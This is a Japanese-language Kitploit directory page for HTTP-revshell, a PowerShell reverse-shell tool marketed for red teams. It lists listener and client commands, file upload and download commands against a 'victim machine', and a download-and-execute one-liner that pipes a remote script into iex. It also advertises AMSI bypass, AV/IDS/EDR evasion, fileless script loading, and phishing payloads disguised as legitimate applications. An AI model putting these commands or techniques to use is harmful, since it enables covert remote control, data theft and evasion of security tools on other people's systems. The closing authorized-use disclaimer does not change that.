Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
HTTP-revshell — HTTP/Sプロトコルを使用したPowerShellリバースシェル(AMSIバイパス、プロキシ対応) | Kitploit
ツール/GitHubGitHub/3v4si0n/http-revshell
フィッシングツールペイロード生成IDS/IPS回避ポストエクスプロイトコマンド&コントロールレッドチーミングリモートアクセスツール
GitHub3v4si0n/http-revshell

HTTP-revshell

HTTP/Sプロトコルを使用したPowerShellリバースシェル(AMSIバイパス、プロキシ対応)

リポジトリを見る
598901年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Powershell HTTP/S リバースシェル

Category-tool Powershell Python License

HTTP-revshell は、レッドチーム演習やペネトレーションテスター向けのツールです。このツールは、http/s プロトコルを介したリバース接続を提供します。Web リクエストを通じて被害マシンを制御するための隠蔽チャネルを使用し、IDS、IPS、AV などのソリューションを回避します。

注: このツールは回避機能に関してメンテナンスされていません。いくつかの変更を加えるだけで、市場の多くの EDR をバイパスできます。

HTTP-revshell

server.py のヘルプ

Server usage:

root@kitploit:~
usage: server.py [-h] [--ssl] [--autocomplete] host port

positional arguments:
  host            Listen Host
  port            Listen Port

optional arguments:
  -h, --help      show this help message and exit
  --ssl           Send traffic over ssl
  --autocomplete  Autocomplete powershell functions

Invoke-WebRev.ps1 のヘルプ (クライアント)

Client usage:

root@kitploit:~
Import-Module .\Invoke-WebRev.ps1
Invoke-WebRev -ip IP -port PORT [-ssl]

インストール

root@kitploit:~
git clone https://github.com/3v4Si0N/HTTP-revshell.git
cd HTTP-revshell/
pip3 install -r requirements.txt

機能

  • SSL
  • プロキシ対応
  • ファイルのアップロード
  • ファイルのダウンロード
  • サーバー経由で powershell スクリプトをロード
  • エラー制御
  • AMSI バイパス
  • PowerShell 関数の自動補完 (オプション)

追加機能の使用方法

アップロード

この機能を使用すると、任意のファイルを被害マシンにアップロードできます。

Usage:

root@kitploit:~
upload /src/path/file C:\dest\path\file

ダウンロード

この機能を使用すると、ファイルを攻撃者マシンにダウンロードできます。

Usage:

root@kitploit:~
download C:\src\path\file /dst/path/file

Loadps1

この機能を使用すると、被害者のディスクに書き込むことなく、正当な HTTP トラフィックを介してファイルを読み取り、powershell スクリプトをロードできます。

Usage:

root@kitploit:~
loadps1 /path/to/the/local/server/PowershellScript.ps1

Revshell-Generator.ps1 のヘルプ (自動ペイロードジェネレーター)

このスクリプトを使用すると、HTTP-revshell を使用するために必要なペイロードを含む実行可能ファイルを作成できます。画面の指示に従うだけで生成できます。6 つの定義済みテンプレートと、好みのデータを設定できるカスタマイズ可能なテンプレートがあります。

ツールによって生成されるペイロードは、アプリケーションの正当なアイコン、および元のアプリケーションの製品情報と著作権情報を組み込んでいます。さらに、それぞれはサーバーとの接続を確立する前に元のアプリケーションを起動し、正当なアプリケーションを装います。これはフィッシングやレッドチーム演習に使用できます。

ペイロードジェネレーターの使用方法:

root@kitploit:~
powershell "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"

Revshell-Generator

重要: 定義済みテンプレートのすべてのフィールドは、Enter キーを押すと自動補完されます。

クレジット

  • JoelGMSec 氏の素晴らしい Revshell-Generator.ps1 に感謝します。Twitter: @JoelGMSec
  • dev-2null 氏の最初のバグ報告に感謝します。Twitter: @dev2null

免責事項とライセンス

このスクリプトは LGPLv3+ の下でライセンスされています。ライセンスへの直接リンク: License.

HTTP-revshell は、許可されたペネトレーションテストおよび/または非営利の教育目的のみに使用されるべきです。このソフトウェアの誤用は、作者または他のコラボレーターの責任ではありません。自己のサーバー、および/またはサーバー所有者の許可を得て使用してください。

ツールをダウンロード